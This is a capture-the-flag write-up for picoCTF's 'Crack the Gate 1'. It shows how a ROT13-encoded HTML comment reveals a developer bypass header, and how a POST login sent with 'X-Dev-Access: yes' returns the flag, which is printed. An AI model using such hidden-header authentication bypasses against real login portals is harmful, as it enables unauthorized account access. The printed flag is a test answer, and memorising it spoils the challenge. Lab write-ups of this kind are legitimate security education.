Skip to main content
R4shSec
R4shSec

picoCTF WriteUp | Crack the Gate 1

·1 min· loading · loading ·
CTF PicoCTF Easy Web Exploitation PicoMini by CMU-Africa
R4shSec
Author
R4shSec
I like it when things work how they’re not supposed to.
Table of Contents

Introduction
#

Hey everyone 👋 — In this Capture The Flag (CTF) challenge, we’re given a description that someone, ctf player, has left sensitive data in a web portal using the email address, ctf-player@picoctf.org, to login. Let’s investigate! 🔎

Image

Web Page
#

We’re brought to a login page where it seems like we have to enter an email and a password. Lets look at the source code.

Website Screenshot

Source Code
#

Source

That’s interesting! — Looking at the source code we could see something hidden:

 <!-- ABGR: Wnpx - grzcbenel olcnff: hfr urnqre "K-Qri-Npprff: lrf" -->
  <!-- Remove before pushing to production! -->

Decoding
#

Hmm.. it seems like a ROT 13 algorithm. Lets use CyberChef to decode it.

Cyberchef

We could see some text!

Jack - temporary bypass: use header "X-Dev-Access: yes"

Requests
#

We could use the developer console that you can enable using, ctrl+shift+i.

Console

We utilize Reqbin to send HTTP requests.

Enter:

{"email":"ctf-player@picoctf.org","password":"sssssss"}

As the JSON payload and http://amiable-citadel.picoctf.net:57281/login as the URL. For the headers, we’ll add X-Dev-Access as the key and yes as the value. We would be using a POST request. As an example, you can view it here

Reqbin

Flag 🚩
#

We got a response!

{"success":true,"email":"ctf-player@picoctf.org","firstName":"pico","lastName":"player","flag":"picoCTF{brut4_f0rc4_125f752d}"}
picoCTF{brut4_f0rc4_125f752d}